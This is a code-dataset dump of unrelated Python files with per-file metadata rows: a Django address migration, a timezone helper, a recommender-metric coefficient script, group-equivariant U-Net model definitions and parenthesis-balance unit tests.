new_name='formatted_address',
),
migrations.RenameField(
model_name='individualaddress',
old_name='city',
new_name='administrative_area',
),
migrations.RenameField(
model_name='individualaddress',
old_name='address',
new_name='formatted_address',
),
migrations.RemoveField(
model_name='inboundcontactaddress',
name='zip_code',
),
migrations.RemoveField(
model_name='individualaddress',
name='zip_code',
),
migrations.AddField(
model_name='inboundcontactaddress',
name='county',
field=models.CharField(blank=True, max_length=127),
),
migrations.AddField(
model_name='inboundcontactaddress',
name='final_type',
field=models.CharField(blank=True, max_length=32),
),
migrations.AddField(
model_name='inboundcontactaddress',
name='latitude',
field=models.FloatField(blank=True, default=None),
),
migrations.AddField(
model_name='inboundcontactaddress',
name='locality',
field=models.CharField(blank=True, max_length=127),
),
migrations.AddField(
model_name='inboundcontactaddress',
name='longitude',
field=models.FloatField(blank=True, default=None),
),
migrations.AddField(
model_name='inboundcontactaddress',
name='postal_code',
field=models.CharField(blank=True, max_length=16),
),
migrations.AddField(
model_name='inboundcontactaddress',
name='postal_code_suffix',
field=models.CharField(blank=True, max_length=16),
),
migrations.AddField(
model_name='inboundcontactaddress',
name='route',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='inboundcontactaddress',
name='street_number',
field=models.IntegerField(blank=True, default=None),
),
migrations.AddField(
model_name='individualaddress',
name='county',
field=models.CharField(blank=True, max_length=127),
),
migrations.AddField(
model_name='individualaddress',
name='final_type',
field=models.CharField(blank=True, max_length=32),
),
migrations.AddField(
model_name='individualaddress',
name='latitude',
field=models.FloatField(blank=True, default=None),
),
migrations.AddField(
model_name='individualaddress',
name='locality',
field=models.CharField(blank=True, max_length=127),
),
migrations.AddField(
model_name='individualaddress',
name='longitude',
field=models.FloatField(blank=True, default=None),
),
migrations.AddField(
model_name='individualaddress',
name='postal_code',
field=models.CharField(blank=True, max_length=16),
),
migrations.AddField(
model_name='individualaddress',
name='postal_code_suffix',
field=models.CharField(blank=True, max_length=16),
),
migrations.AddField(
model_name='individualaddress',
name='route',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='individualaddress',
name='street_number',
field=models.IntegerField(blank=True, default=None),
),
]
| 33.029851 | 64 | 0.569363 | 375 | 4,426 | 6.538667 | 0.189333 | 0.088091 | 0.168842 | 0.198206 | 0.878467 | 0.878467 | 0.827896 | 0.776509 | 0.738173 | 0.738173 | 0 | 0.020979 | 0.321509 | 4,426 | 133 | 65 | 33.278195 | 0.795538 | 0.015364 | 0 | 0.936508 | 1 | 0 | 0.176349 | 0.063146 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.015873 | 0 | 0.039683 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
64f87cdcd2fb2d91861849cf510ec1f56ec9d32c | 136 | py | Python | build_you/utils/datetime.py | bostud/build_you | 258a336a82a1da9efc102770f5d8bf83abc13379 | [
"MIT"
] | null | null | null | build_you/utils/datetime.py | bostud/build_you | 258a336a82a1da9efc102770f5d8bf83abc13379 | [
"MIT"
] | null | null | null | build_you/utils/datetime.py | bostud/build_you | 258a336a82a1da9efc102770f5d8bf83abc13379 | [
"MIT"
] | null | null | null | import pytz
from datetime import datetime
def datetime_now_tz() -> datetime:
return datetime.now(tz=pytz.timezone('Europe/Kiev'))
| 19.428571 | 56 | 0.757353 | 19 | 136 | 5.315789 | 0.578947 | 0.217822 | 0.257426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132353 | 136 | 6 | 57 | 22.666667 | 0.855932 | 0 | 0 | 0 | 0 | 0 | 0.080882 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 8 |
8f30db13ca3de69ffc80454137cf74a6ea82983f | 3,638 | py | Python | src/evaluation/coefficient.py | DiegoCorrea/masters-dissertation | 61d6e9c46da6cf1e7d904f98eb1d46d907a74576 | [
"MIT"
] | null | null | null | src/evaluation/coefficient.py | DiegoCorrea/masters-dissertation | 61d6e9c46da6cf1e7d904f98eb1d46d907a74576 | [
"MIT"
] | null | null | null | src/evaluation/coefficient.py | DiegoCorrea/masters-dissertation | 61d6e9c46da6cf1e7d904f98eb1d46d907a74576 | [
"MIT"
] | null | null | null | import os
from src.config.labels import CALIBRATION_LABEL, FAIRNESS_METRIC_LABEL, EVALUATION_METRIC_LABEL, MAP_LABEL, MACE_LABEL, \
ALGORITHM_LABEL, EVALUATION_VALUE_LABEL, MC_LABEL
from src.config.path_dir_files import coefficient_results_path
import pandas as pd
def coefficient(results_df, db):
save_dir = coefficient_results_path(db) + 'all/'
for divergence in results_df[FAIRNESS_METRIC_LABEL].unique().tolist():
divergence_df = results_df[results_df[FAIRNESS_METRIC_LABEL] == divergence]
for tradeoff in divergence_df[CALIBRATION_LABEL].unique().tolist():
tradeoff_divergence_df = divergence_df[divergence_df[CALIBRATION_LABEL] == tradeoff]
for metric in [MACE_LABEL, MC_LABEL]:
metric_dict = {}
for algorithm in tradeoff_divergence_df[ALGORITHM_LABEL].unique().tolist():
algorithm_tradeoff_divergence_df = tradeoff_divergence_df[
tradeoff_divergence_df[ALGORITHM_LABEL] == algorithm]
map_df = algorithm_tradeoff_divergence_df[
algorithm_tradeoff_divergence_df[EVALUATION_METRIC_LABEL] == MAP_LABEL]
metric_df = algorithm_tradeoff_divergence_df[
algorithm_tradeoff_divergence_df[EVALUATION_METRIC_LABEL] == metric]
map_value = map_df[EVALUATION_VALUE_LABEL].mean()
metric_value = metric_df[EVALUATION_VALUE_LABEL].mean()
metric_dict[algorithm] = [round(metric_value/map_value, 2)]
metric_sorted_dict = dict(sorted(metric_dict.items()))
coe_df = pd.DataFrame.from_dict(metric_sorted_dict)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
file_name = "_".join([metric, MAP_LABEL, divergence, tradeoff, '.csv'])
coe_df.to_csv(os.path.join(save_dir, file_name), index=False)
def decision(results_df, db):
save_dir = coefficient_results_path(db) + 'decision/'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
for divergence in results_df[FAIRNESS_METRIC_LABEL].unique().tolist():
divergence_df = results_df[results_df[FAIRNESS_METRIC_LABEL] == divergence]
for tradeoff in divergence_df[CALIBRATION_LABEL].unique().tolist():
tradeoff_divergence_df = divergence_df[divergence_df[CALIBRATION_LABEL] == tradeoff]
metric_dict = {}
for algorithm in tradeoff_divergence_df[ALGORITHM_LABEL].unique().tolist():
algorithm_tradeoff_divergence_df = tradeoff_divergence_df[
tradeoff_divergence_df[ALGORITHM_LABEL] == algorithm]
map_df = algorithm_tradeoff_divergence_df[
algorithm_tradeoff_divergence_df[EVALUATION_METRIC_LABEL] == MAP_LABEL]
map_value = map_df[EVALUATION_VALUE_LABEL].mean()
dec = 0
for metric in [MACE_LABEL, MC_LABEL]:
metric_df = algorithm_tradeoff_divergence_df[
algorithm_tradeoff_divergence_df[EVALUATION_METRIC_LABEL] == metric]
metric_value = metric_df[EVALUATION_VALUE_LABEL].mean()
dec += round(metric_value/map_value, 2)
metric_dict[algorithm] = [round(dec, 2)]
metric_sorted_dict = dict(sorted(metric_dict.items()))
coe_df = pd.DataFrame.from_dict(metric_sorted_dict)
file_name = "_".join([divergence, tradeoff, '.csv'])
coe_df.to_csv(os.path.join(save_dir, file_name), index=False)
| 55.969231 | 121 | 0.660803 | 417 | 3,638 | 5.352518 | 0.136691 | 0.139785 | 0.16129 | 0.129928 | 0.867384 | 0.854391 | 0.849014 | 0.824373 | 0.730735 | 0.6931 | 0 | 0.001474 | 0.253986 | 3,638 | 64 | 122 | 56.84375 | 0.820929 | 0 | 0 | 0.727273 | 0 | 0 | 0.006322 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036364 | false | 0 | 0.072727 | 0 | 0.109091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
56cb2b65e72b8dc8605024e6cbf1eed21f1d58ae | 20,610 | py | Python | scripts/g_model.py | thatvinhton/G-U-Net | 8a77a8cfc278b7feff8651cf27552aeddc84473d | [
"MIT"
] | 21 | 2019-06-11T01:48:21.000Z | 2021-12-14T07:29:00.000Z | scripts/g_model.py | thatvinhton/G-U-Net | 8a77a8cfc278b7feff8651cf27552aeddc84473d | [
"MIT"
] | 3 | 2020-01-02T03:09:28.000Z | 2020-03-26T13:39:55.000Z | scripts/g_model.py | thatvinhton/G-U-Net | 8a77a8cfc278b7feff8651cf27552aeddc84473d | [
"MIT"
] | 5 | 2019-11-22T17:15:53.000Z | 2022-03-09T02:56:04.000Z | from scripts.network import Network
class G_UNetResidual_Ext2(Network):
def getOutput(self):
return self.layers['conv9_gl']
def setup(self, is_training, num_classes):
(self.feed('data')
.g_conv('Z2', 'C4', 7, 32, 1, 1, padding='SAME', name='conv1_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv1_bn1')
#.dropout(keep_prob=0.9, is_training=is_training, name='conv1_dr1')
.relu(name='conv1_rl1')
.max_pool(2, 2, 2, 2, padding='VALID', name='conv1_mp1'))
(self.feed('conv1_rl1')
.g_residual_block(use_dropout=False, name='conv1_add_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv1_add_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv1_add_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv1_add_residual4', padding='SAME')
.g_residual_block(use_dropout=False, name='conv1_add_residual5', padding='SAME')
.g_residual_block(use_dropout=False, name='conv1_add_residual6', padding='SAME')
.g_residual_block(use_dropout=False, name='conv1_add_residual7', padding='SAME')
.g_residual_block(use_dropout=False, name='conv1_add_residual8', padding='SAME')
)
(self.feed('conv1_mp1')
.g_conv('C4', 'C4', 3, 64, 1, 1, padding='SAME', name='conv2_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv2_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv2_dr1')
.relu(name='conv2_rl1')
.g_residual_block(use_dropout=False, name='conv2_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv2_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv2_residual3', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv2_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv2_dr2')
.relu(name='conv2_rl2')
.max_pool(2, 2, 2, 2, padding='VALID', name='conv2_mp1'))
(self.feed('conv2_rl2')
.g_residual_block(use_dropout=False, name='conv2_add_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv2_add_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv2_add_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv2_add_residual4', padding='SAME')
.g_residual_block(use_dropout=False, name='conv2_add_residual5', padding='SAME')
.g_residual_block(use_dropout=False, name='conv2_add_residual6', padding='SAME')
)
(self.feed('conv2_mp1')
.g_conv('C4', 'C4', 3, 128, 1, 1, padding='SAME', name='conv3_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv3_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv3_dr1')
.relu(name='conv3_rl1')
.g_residual_block(use_dropout=False, name='conv3_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv3_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv3_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv3_residual4', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv3_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv3_dr2')
.relu(name='conv3_rl2')
.max_pool(2, 2, 2, 2, padding='VALID', name='conv3_mp1'))
(self.feed('conv3_rl2')
.g_residual_block(use_dropout=False, name='conv3_add_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv3_add_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv3_add_residual3', padding='SAME')
)
(self.feed('conv3_mp1')
.g_conv('C4', 'C4', 3, 256, 1, 1, padding='SAME', name='conv4_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv4_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv4_dr1')
.relu(name='conv4_rl1')
.g_residual_block(use_dropout=False, name='conv4_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual4', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual5', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual6', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv4_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv4_dr2')
.relu(name='conv4_rl2')
.max_pool(2, 2, 2, 2, padding='VALID', name='conv4_mp1'))
(self.feed('conv4_mp1')
.g_conv('C4', 'C4', 3, 256, 1, 1, padding='SAME', name='conv5_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv5_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv5_dr1')
.relu(name='conv5_rl1')
.g_residual_block(use_dropout=False, name='conv5_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv5_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv5_residual3', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv5_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv5_dr2')
.relu(name='conv5_rl2')
.g_conv('C4', 'C4', 3, 256, 1, 1, padding='SAME', name='conv5_2')
.g_batch_norm_tensorflow(input_type='C4', name='conv5_bn3')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv5_dr3')
.relu(name='conv5_rl3')
.upsampling(name='conv5_up'))
(self.feed('conv5_up', 'conv4_rl2')
.g_concat(name='conv6_i')
.g_batch_norm_tensorflow(input_type='C4', name='conv6_bn0')
.g_conv('C4', 'C4', 3, 256, 1, 1, padding='SAME', name='conv6_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv6_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv6_dr1')
.relu(name='conv6_rl1')
.g_residual_block(use_dropout=False, name='conv6_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual4', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual5', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual6', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv6_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv6_dr2')
.relu(name='conv6_rl2')
.g_conv('C4', 'C4', 3, 128, 1, 1, padding='SAME', name='conv6_2')
.g_batch_norm_tensorflow(input_type='C4', name='conv6_bn3')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv6_dr3')
.relu(name='conv6_rl3')
.upsampling(name='conv6_up'))
(self.feed('conv6_up', 'conv3_add_residual3')
.g_concat(name='conv7_i')
.g_batch_norm_tensorflow(input_type='C4', name='conv7_bn0')
.g_conv('C4', 'C4', 3, 128, 1, 1, padding='SAME', name='conv7_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv7_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv7_dr1')
.relu(name='conv7_rl1')
.g_residual_block(use_dropout=False, name='conv7_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv7_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv7_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv7_residual4', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv7_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv7_dr2')
.relu(name='conv7_rl2')
.g_conv('C4', 'C4', 3, 64, 1, 1, padding='SAME', name='conv7_2')
.g_batch_norm_tensorflow(input_type='C4', name='conv7_bn3')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv7_dr3')
.relu(name='conv7_rl3')
.upsampling(name='conv7_up'))
(self.feed('conv7_up', 'conv2_add_residual6')
.g_concat(name='conv8_i')
.g_batch_norm_tensorflow(input_type='C4', name='conv8_bn0')
.g_conv('C4', 'C4', 3, 64, 1, 1, padding='SAME', name='conv8_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv8_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv8_dr1')
.relu(name='conv8_rl1')
.g_residual_block(use_dropout=False, name='conv8_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv8_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv8_residual3', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv8_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv8_dr2')
.relu(name='conv8_rl2')
.g_conv('C4', 'C4', 3, 32, 1, 1, padding='SAME', name='conv8_2')
.g_batch_norm_tensorflow(input_type='C4', name='conv8_bn3')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv8_dr3')
.relu(name='conv8_rl3')
.upsampling(name='conv8_up'))
(self.feed('conv8_up', 'conv1_add_residual8')
.g_concat(name='conv9_i')
.g_batch_norm_tensorflow(input_type='C4', name='conv9_bn0')
.g_conv('C4', 'C4', 3, 32, 1, 1, padding='SAME', name='conv9_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv9_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv9_dr1')
.relu(name='conv9_rl1')
.g_conv('C4', 'C4', 3, 3, 1, 1, padding='SAME', name='conv9_2')
.g_avg_global_pool(name='conv9_gl'))
class G_UNetResidual(Network):
def getOutput(self):
return self.layers['conv9_gl']
def setup(self, is_training, num_classes):
(self.feed('data')
.g_conv('Z2', 'C4', 7, 32, 1, 1, padding='SAME', name='conv1_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv1_bn1')
#.dropout(keep_prob=0.9, is_training=is_training, name='conv1_dr1')
.relu(name='conv1_rl1')
.max_pool(2, 2, 2, 2, padding='VALID', name='conv1_mp1'))
(self.feed('conv1_mp1')
.g_conv('C4', 'C4', 3, 64, 1, 1, padding='SAME', name='conv2_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv2_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv2_dr1')
.relu(name='conv2_rl1')
.g_residual_block(use_dropout=False, name='conv2_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv2_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv2_residual3', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv2_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv2_dr2')
.relu(name='conv2_rl2')
.max_pool(2, 2, 2, 2, padding='VALID', name='conv2_mp1'))
(self.feed('conv2_mp1')
.g_conv('C4', 'C4', 3, 128, 1, 1, padding='SAME', name='conv3_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv3_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv3_dr1')
.relu(name='conv3_rl1')
.g_residual_block(use_dropout=False, name='conv3_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv3_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv3_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv3_residual4', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv3_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv3_dr2')
.relu(name='conv3_rl2')
.max_pool(2, 2, 2, 2, padding='VALID', name='conv3_mp1'))
(self.feed('conv3_mp1')
.g_conv('C4', 'C4', 3, 256, 1, 1, padding='SAME', name='conv4_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv4_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv4_dr1')
.relu(name='conv4_rl1')
.g_residual_block(use_dropout=False, name='conv4_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual4', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual5', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual6', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv4_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv4_dr2')
.relu(name='conv4_rl2')
.max_pool(2, 2, 2, 2, padding='VALID', name='conv4_mp1'))
(self.feed('conv4_mp1')
.g_conv('C4', 'C4', 3, 256, 1, 1, padding='SAME', name='conv5_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv5_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv5_dr1')
.relu(name='conv5_rl1')
.g_residual_block(use_dropout=False, name='conv5_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv5_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv5_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv5_residual4')
.g_batch_norm_tensorflow(input_type='C4', name='conv5_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv5_dr2')
.relu(name='conv5_rl2')
.g_conv('C4', 'C4', 3, 256, 1, 1, padding='SAME', name='conv5_2')
.g_batch_norm_tensorflow(input_type='C4', name='conv5_bn3')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv5_dr3')
.relu(name='conv5_rl3')
.upsampling(name='conv5_up'))
(self.feed('conv5_up', 'conv4_rl2')
.g_concat(name='conv6_i')
.g_batch_norm_tensorflow(input_type='C4', name='conv6_bn0')
.g_conv('C4', 'C4', 3, 256, 1, 1, padding='SAME', name='conv6_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv6_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv6_dr1')
.relu(name='conv6_rl1')
.g_residual_block(use_dropout=False, name='conv6_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual4', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual5', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual6', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv6_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv6_dr2')
.relu(name='conv6_rl2')
.g_conv('C4', 'C4', 3, 128, 1, 1, padding='SAME', name='conv6_2')
.g_batch_norm_tensorflow(input_type='C4', name='conv6_bn3')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv6_dr3')
.relu(name='conv6_rl3')
.upsampling(name='conv6_up'))
(self.feed('conv6_up', 'conv3_rl2')
.g_concat(name='conv7_i')
.g_batch_norm_tensorflow(input_type='C4', name='conv7_bn0')
.g_conv('C4', 'C4', 3, 128, 1, 1, padding='SAME', name='conv7_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv7_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv7_dr1')
.relu(name='conv7_rl1')
.g_residual_block(use_dropout=False, name='conv7_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv7_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv7_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv7_residual4', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv7_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv7_dr2')
.relu(name='conv7_rl2')
.g_conv('C4', 'C4', 3, 64, 1, 1, padding='SAME', name='conv7_2')
.g_batch_norm_tensorflow(input_type='C4', name='conv7_bn3')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv7_dr3')
.relu(name='conv7_rl3')
.upsampling(name='conv7_up'))
(self.feed('conv7_up', 'conv2_rl2')
.g_concat(name='conv8_i')
.g_batch_norm_tensorflow(input_type='C4', name='conv8_bn0')
.g_conv('C4', 'C4', 3, 64, 1, 1, padding='SAME', name='conv8_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv8_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv8_dr1')
.relu(name='conv8_rl1')
.g_residual_block(use_dropout=False, name='conv8_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv8_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv8_residual3', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv8_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv8_dr2')
.relu(name='conv8_rl2')
.g_conv('C4', 'C4', 3, 32, 1, 1, padding='SAME', name='conv8_2')
.g_batch_norm_tensorflow(input_type='C4', name='conv8_bn3')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv8_dr3')
.relu(name='conv8_rl3')
.upsampling(name='conv8_up'))
(self.feed('conv8_up', 'conv1_rl1')
.g_concat(name='conv9_i')
.g_batch_norm_tensorflow(input_type='C4', name='conv9_bn0')
.g_conv('C4', 'C4', 3, 32, 1, 1, padding='SAME', name='conv9_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv9_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv9_dr1')
.relu(name='conv9_rl1')
.g_conv('C4', 'C4', 3, 3, 1, 1, padding='SAME', name='conv9_2')
.g_avg_global_pool(name='conv9_gl'))
| 63.415385 | 96 | 0.595827 | 2,654 | 20,610 | 4.28636 | 0.033534 | 0.099596 | 0.09353 | 0.113572 | 0.982155 | 0.982155 | 0.982155 | 0.982155 | 0.981364 | 0.971343 | 0 | 0.059524 | 0.254148 | 20,610 | 324 | 97 | 63.611111 | 0.680523 | 0.128093 | 0 | 0.868526 | 0 | 0 | 0.187036 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015936 | false | 0 | 0.003984 | 0.007968 | 0.035857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8552b83691715a1f9be19d8db23e6ef339d613d8 | 1,568 | py | Python | balance_checker/balance_checker_test.py | JuanJUribe/google-problems | 6b3a7a3cc201c9934f9ebfc414ecca4498fbc099 | [
"MIT"
] | null | null | null | balance_checker/balance_checker_test.py | JuanJUribe/google-problems | 6b3a7a3cc201c9934f9ebfc414ecca4498fbc099 | [
"MIT"
] | null | null | null | balance_checker/balance_checker_test.py | JuanJUribe/google-problems | 6b3a7a3cc201c9934f9ebfc414ecca4498fbc099 | [
"MIT"
] | null | null | null | import sys
import unittest
from balance_checker import is_string_balanced
class TestBueller(unittest.TestCase):
def setUp(self):
pass
def test_sinlge_balanced(self):
string = "(This string is balanced)"
self.assertTrue(is_string_balanced(string))
def test_multiple_balanced_1(self):
string = "(This (string is) balanced)"
self.assertTrue(is_string_balanced(string))
def test_multiple_balanced_2(self):
string = "(This) string is (balanced)"
self.assertTrue(is_string_balanced(string))
def test_multiple_balanced_3(self):
string = "(This) (string is (balanced))"
self.assertTrue(is_string_balanced(string))
def test_wrong_order(self):
string = ")This string is not balanced("
self.assertFalse(is_string_balanced(string))
def test_only_open(self):
string = "(This (string is not balanced("
self.assertFalse(is_string_balanced(string))
def test_only_close(self):
string = ")This )string is not balanced)"
self.assertFalse(is_string_balanced(string))
def test_unbalanced_1(self):
string = "(This) string is not balanced)"
self.assertFalse(is_string_balanced(string))
def test_unbalanced_2(self):
string = "(This) string is not balanced)("
self.assertFalse(is_string_balanced(string))
def test_unbalanced_3(self):
string = "((This string is not balanced)("
self.assertFalse(is_string_balanced(string))
if __name__ == '__main__':
unittest.main() | 30.745098 | 52 | 0.679847 | 193 | 1,568 | 5.243523 | 0.181347 | 0.086957 | 0.173913 | 0.197628 | 0.829051 | 0.829051 | 0.823123 | 0.823123 | 0.823123 | 0.823123 | 0 | 0.004894 | 0.218112 | 1,568 | 51 | 53 | 30.745098 | 0.820555 | 0 | 0 | 0.263158 | 0 | 0 | 0.189293 | 0 | 0 | 0 | 0 | 0 | 0.263158 | 1 | 0.289474 | false | 0.026316 | 0.078947 | 0 | 0.394737 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
85b0ec6aea9ae0941461343880ad276ee192e94c | 644 | py | Python | hola_nbdev/None.py | arlingvazquez/hola_nbdev | 6f6a114873c3d93f0bd366403a0e71cc03f7c687 | [
"Apache-2.0"
